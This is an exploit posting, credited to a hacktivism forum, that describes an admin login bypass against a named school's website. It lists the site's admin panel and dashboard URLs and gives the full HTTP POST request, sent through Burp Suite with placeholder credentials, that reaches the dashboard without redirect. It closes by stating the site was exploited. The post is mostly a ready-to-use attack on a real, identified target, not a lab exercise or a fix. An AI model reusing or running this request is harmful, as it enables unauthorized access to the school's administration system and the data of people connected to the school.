# Exploit Title : Aradhana Public School NoRedirect Admin Bypass
# Exploit Date : 02.17.2023
# Exploit Author : sc0field
# Forum : HACKTIVIZM.ORG
Admin Panel ->
http://apsrohru.com/admin/index.php
Admin Dashboard ->
http://apsrohru.com/admin/dashboard.php
Exploit Method :
http://apsrohru.com/admin/index.php
this page we send requests with burp suite
We are sending this request from the proxy point :
POST /admin/dashboard.php HTTP/1.1
Host: apsrohru.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Origin: http://apsrohru.com
Connection: close
Referer: http://apsrohru.com/admin/index.php
Cookie: PHPSESSID=cpjpi29etdj7qaigoultdp8986
Upgrade-Insecure-Requests: 1
username=1&password=1&user-login=true
and exploited